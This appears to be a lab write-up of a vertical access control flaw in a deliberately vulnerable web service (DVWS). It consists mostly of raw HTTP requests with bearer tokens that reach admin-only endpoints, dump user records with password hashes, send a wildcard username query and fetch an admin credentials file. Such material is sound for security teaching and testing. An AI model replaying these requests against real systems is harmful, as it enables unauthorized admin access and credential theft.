Vertical Access Control

Introduction

Vertical escalation of privilege is possible if the user-controlled key is actually a flag that indicates administrator status, allowing the attacker to gain administrative access.

Details

Multiple API calls that can only be done by an admin user within the admin area can be called by a non admin-privileged user.

• sysinfo API call within the Admin area

GET /api/v2/sysinfo/uname HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjA5MDk5MTM4LCJleHAiOjE2MDkyNzE5MzgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.wcQvzhGMkdqcL1VZTlofzfJDHTsUni34C660F2VvNO8
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://dvws.local/admin.html

• User API call (hidden route) which should only be accessible to an admin user

GET /api/v2/users/ HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjA5MDk5MTM4LCJleHAiOjE2MDkyNzE5MzgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.wcQvzhGMkdqcL1VZTlofzfJDHTsUni34C660F2VvNO8
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://dvws.local/admin.html



HTTP/1.1 200 OK
X-Powered-By: Express
Vary: Origin
Access-Control-Allow-Credentials: true
Cache-Control: no-store, no-cache, must-revalidate, private
Content-Type: application/json; charset=utf-8
Content-Length: 336
ETag: W/"150-U21Rzwqx2eclXLDMAAfH+1UjAsM"
Date: Sun, 27 Dec 2020 20:06:53 GMT
Connection: close

{"status":200,"error":null,"result":[{"admin":true,"_id":"5fe8e39efcabaf77ecb41eb4","username":"admin","password":"$2b$10$vvkGUd4nUXoB7E1eHXjAYeTzmnBEyCFoQP623GikMla994eQ0Qp26","__v":0},{"admin":false,"_id":"5fe8e39efcabaf77ecb41eb5","username":"test","password":"$2b$10$VHm5/Ze62acPOQWXf7GkJuOZ0rglYAY.yAXJpxQw5as7kxrPb20L.","__v":0}]}

Further the following to requests within the Admin area is accessible unauthenticated

POST /dvwsuserservice HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJwZXJtaXNzaW9ucyI6WyJ1c2VyOnJlYWQiLCJ1c2VyOndyaXRlIiwidXNlcjphZG1pbiJdLCJpYXQiOjE2MDkwOTg1MzYsImV4cCI6MTYwOTI3MTMzNiwiaXNzIjoiaHR0cHM6Ly9naXRodWIuY29tL3Nub29weXNlY3VyaXR5In0.Nc2eb_QabrG9gYibr5ekm_TaVwlnoWHDzfp9pDt8C1k
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 457
Origin: http://dvws.local
Connection: close
Referer: http://dvws.local/admin.html

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:examples:usernameservice">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:Username soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <username xsi:type="xsd:string">*</username>
      </urn:Username>
   </soapenv:Body>
</soapenv:Envelope>

GET /uploads/admin/creds.xml HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

References

• https://pentest.blog/how-to-test-horizontal-vertical-authorization-issues-in-web-application/